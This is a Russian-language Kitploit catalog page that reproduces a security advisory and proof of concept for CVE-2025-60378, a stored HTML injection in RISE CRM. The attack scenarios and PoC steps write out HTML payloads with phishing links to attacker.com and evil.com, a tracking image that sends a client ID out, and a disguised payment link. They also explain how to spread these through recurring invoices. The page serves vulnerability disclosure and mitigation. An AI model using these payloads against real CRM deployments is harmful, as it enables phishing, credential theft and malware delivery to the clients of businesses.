Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-60378 — Доказательство концепции для хранимой HTML-инъекции в RISE CRM, демонстрирующее, как аутентифицированные пользователи могут внедрять вредоносный HTML в счета и сообщения, что приводит к фишингу и распространению вредоносного ПО через автоматические электронные письма и PDF-файлы. | Kitploit
Инструменты/GitHubGitHub/ajansha/cve-2025-60378
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийФишингВеб-безопасностьОбучение и Образование
GitHubajansha/cve-2025-60378

CVE-2025-60378

Доказательство концепции для хранимой HTML-инъекции в RISE CRM, демонстрирующее, как аутентифицированные пользователи могут внедрять вредоносный HTML в счета и сообщения, что приводит к фишингу и распространению вредоносного ПО через автоматические электронные письма и PDF-файлы.

Репозиторий
10 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-60378: Хранимая HTML-инъекция в RISE Ultimate Project Manager & CRM

⚠️ Уведомление о безопасности
Критическая уязвимость хранимой HTML-инъекции, затрагивающая счета, обмен сообщениями и автоматические уведомления

CVE Severity CVSS Product


📋 Обзор

Критическая уязвимость хранимой HTML-инъекции обнаружена в RISE Ultimate Project Manager & CRM, которая позволяет аутентифицированным пользователям внедрять вредоносный HTML в позиции счетов, заметки клиентов и модули обмена сообщениями. Внедренный контент сохраняется в базе данных и автоматически отображается в клиентских электронных письмах, PDF-файлах и чат-коммуникациях, что позволяет проводить масштабные фишинговые атаки, компрометацию деловой электронной почты и доставку вредоносного ПО через электронную почту/PDF.

🎯 Затронутые версии

  • Продукт: RISE - Ultimate Project Manager & CRM
  • Уязвимые версии: < 3.9.4
  • Исправленная версия: 3.9.4+

🔍 Детали уязвимости

АтрибутЗначение
CVE IDCVE-2025-60378
ТипХранимая HTML-инъекция
CWECWE-79
Вектор атакиСеть/Удаленно
АутентификацияТребуется (низкие привилегии)
Взаимодействие с пользователемНет
СерьезностьВЫСОКАЯ
CVSS v3.18.1 - Высокая
ОбнаружилAjansha Shankar

Описание

RISE CRM не выполняет надлежащую санитизацию и кодирование HTML-контента в нескольких редактируемых пользователем полях, включая счета, сообщения и заметки клиентов. Когда аутентифицированные пользователи внедряют HTML-полезные нагрузки в эти поля, контент сохраняется в базе данных без адекватной фильтрации. Впоследствии этот вредоносный HTML автоматически отображается в клиентских электронных письмах, PDF-вложениях и модулях обмена сообщениями/чата без надлежащего экранирования. Повторяющиеся счета и автоматические сообщения усиливают атаку, распространяя вредоносный контент одновременно нескольким получателям.

Затронутые компоненты

  • ✗ Позиции счетов (поле описания)
  • ✗ Модуль заметок/сообщений клиента
  • ✗ Система чата и обмена сообщениями
  • ✗ Модуль формирования выписок для клиентов
  • ✗ Автоматическая система электронной почты (повторяющиеся счета, напоминания)
  • ✗ PDF-вложения

Основная причина

  • ❌ Недостаточная санитизация ввода в полях счетов, сообщений и заметок клиентов
  • ❌ Отсутствие кодирования HTML-вывода в шаблонах электронной почты и при генерации PDF
  • ❌ Отсутствие проверки контента перед сохранением в базе данных
  • ❌ Отсутствие ограничений на HTML/JavaScript в коммуникациях с клиентами
  • ❌ Автоматические системы распространяют непроверенный контент без дополнительной фильтрации

💥 Воздействие

Последствия для безопасности

  • 🎣 Масштабный фишинг: Внедренный контент может имитировать легитимные коммуникации и перенаправлять нескольких клиентов на сайты, контролируемые злоумышленником
  • 💼 Компрометация деловой электронной почты: Вредоносные счета и сообщения, отправленные клиентам, выглядят как исходящие из доверенного источника
  • 💬 Скомпрометированный обмен сообщениями: Вредоносные полезные нагрузки в чате/обмене сообщениями достигают членов команды и клиентов напрямую
  • 🦠 Распространение вредоносного ПО: Встроенные вредоносные ссылки или iframe доставляют вредоносное ПО через электронную почту/PDF/обмен сообщениями
  • 🔄 Автоматическое распространение атаки: Повторяющиеся счета и автоматические сообщения обеспечивают доставку полезной нагрузки нескольким получателям без ручного вмешательства
  • 👥 Многовекторная атака: Комбинированные поверхности атаки через электронную почту, PDF и обмен сообщениями повышают вероятность успешной компрометации

Оценка триады CIA

ФакторВоздействиеПояснение
Конфиденциальность🔴 ВЫСОКОЕУчетные данные клиентов и конфиденциальные данные могут быть собраны через фишинг
Целостность🔴 ВЫСОКОЕВредоносный контент может исказить восприятие коммуникаций и деловых отношений
Доступность🟡 НИЗКОЕОграниченное прямое воздействие на доступность системы

Реальные сценарии атак

Сценарий 1: Фишинговая кампания на основе счетов

Злоумышленник с низкими привилегиями менеджера проекта создает счет с вредоносным HTML:

root@kitploit:~
<a href="https://attacker.com/fake-payment">Click here to view payment status</a>

Счет отправляется более чем 100 клиентам через автоматическую электронную почту. Все клиенты получают то, что выглядит как легитимный счет, направляющий их на фишинговый сайт. Злоумышленник одновременно собирает учетные данные от нескольких жертв.

Сценарий 2: Атака через обмен сообщениями

Злоумышленник внедряет вредоносный HTML в сообщение клиенту:

root@kitploit:~
<img src="https://attacker.com/track.gif?user=CLIENT_ID">
<a href="https://malware.com">Download Updated Project Files</a>

Все члены команды и клиенты получают сообщение в чате и переходят по ссылкам для загрузки вредоносного ПО.

Сценарий 3: Доставка вредоносного ПО через повторяющиеся счета

Злоумышленник настраивает повторяющийся счет с полезной нагрузкой для доставки вредоносного ПО. Каждый месяц клиенты автоматически получают счета со встроенным вредоносным контентом, что обеспечивает постоянный вектор атаки.

🧪 Доказательство концепции

Настройка среды

  • Доступ к панели администратора RISE CRM с правами на создание счетов/сообщений
  • Любая версия до 3.9.4

Шаги PoC

Шаг 1: Доступ к созданию счета или сообщения

root@kitploit:~
Перейдите: Панель управления RISE CRM → Счета/Сообщения → Создать новый

Шаг 2: Внедрение HTML-полезной нагрузки в поле описания/сообщения

root@kitploit:~
<a href="https://attacker.com">Click here to view invoice</a>

Шаг 3: Добавление вредоносного изображения с перенаправлением

root@kitploit:~
<a href="https://evil.com" target="_blank">
  <img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
</a>

Шаг 4: Добавление вводящей в заблуждение стилизации

root@kitploit:~
<h1><font color=red>Visit Our New WebSite</font></h1>
<h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>

Шаг 5: Настройка повторяющегося распространения

  • Сохраните запись
  • Включите опцию "Повторяющийся" (если доступно для счетов/сообщений)
  • Установите частоту (еженедельно, ежемесячно и т.д.)
  • Система автоматически отправляет всем соответствующим клиентам

Шаг 6: Проверка вектора атаки

  • Проверьте почтовый ящик клиента
  • Проверьте обмен сообщениями/чат клиента
  • Откройте PDF-вложение
  • Наблюдайте отображение вредоносного HTML во всех каналах

Ожидаемый результат

✅ Внедренный HTML отображается в электронных письмах, PDF и обмене сообщениями без экранирования ✅ Ссылки кликабельны и перенаправляют на сайты злоумышленника ✅ Изображения загружаются с серверов, контролируемых злоумышленником ✅ Контент сохраняется во всех будущих коммуникациях с клиентами ✅ Повторяющееся распространение автоматически достигает нескольких получателей

🛡️ Смягчение последствий

Для конечных пользователей

  1. ✅ Немедленное обновление: Обновите RISE CRM до версии 3.9.4 или новее
  2. 🔍 Аудит всех записей: Проверьте недавние счета, сообщения и заметки клиентов на наличие подозрительного HTML-контента
  3. ⚠️ Уведомление клиентов: Предупредите всех клиентов, если были отправлены подозрительные счета или сообщения
  4. 🔄 Сброс учетных данных: Рекомендуйте клиентам сменить пароли, если они переходили по ссылкам
  5. 📝 Мониторинг активности: Проверьте журналы аудита на предмет несанкционированных изменений счетов/сообщений
  6. 🔐 Отключение повторяющихся: Временно отключите повторяющиеся счета/сообщения до установки исправления

📚 Ссылки

  • CWE-79: Improper Neutralization of Input During Web Page Generation
  • OWASP: Cross-site Scripting (XSS)
  • OWASP: HTML Injection
  • OWASP: Output Encoding
  • CVE-2025-60378 Official Entry

📅 Хронология

ДатаСобытие
TBDУязвимость обнаружена
TBDПоставщик уведомлен
TBDПрисвоен CVE-2025-60378
TBDВыпущено исправление (v3.9.4)
TBDПубличное раскрытие

👤 Авторы

Обнаружил: Ajansha Shankar

LinkedIn: https://www.linkedin.com/in/ajansha-shankar/

📊 Оценка CVSS v3.1

Вектор: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Оценка: 8.1 (ВЫСОКАЯ)

Разбивка:

  • Вектор атаки (AV:N): Сеть - Может быть использована удаленно
  • Сложность атаки (AC:L): Низкая - Не требуются особые условия
  • Требуемые привилегии (PR:L): Низкие - Требуется аутентифицированный пользователь с базовыми привилегиями менеджера проекта
  • Взаимодействие с пользователем (UI:N): Нет - Взаимодействие с пользователем не требуется; автоматические системы распространяют полезную нагрузку
  • Область действия (S:U): Без изменений - Воздействие ограничено уязвимым компонентом
  • Конфиденциальность (C:H): Высокая - Возможна кража учетных данных через фишинг у нескольких клиентов
  • Целостность (I:H): Высокая - Вредоносный контент может быть внедрен и доставлен нескольким получателям
  • Доступность (A:N): Нет - Нет воздействия на доступность системы

📧 Контакты

По вопросам или за дополнительной информацией:

  • LinkedIn: https://www.linkedin.com/in/ajansha-shankar/

⭐ Если это исследование было полезным, пожалуйста, поставьте звезду этому репозиторию!

🔔 Будьте в курсе: Следите за этим репозиторием для получения обновлений по этому и будущим исследованиям безопасности.

  • CVE-2025-60374 - Stored XSS in Perfex CRM Chatbot
  • CVE-2025-55903 - Stored HTML Injection in Perfex CRM Invoices
  • CVE-2025-60375 - Authentication Bypass in Perfex CRM
Скачать инструмент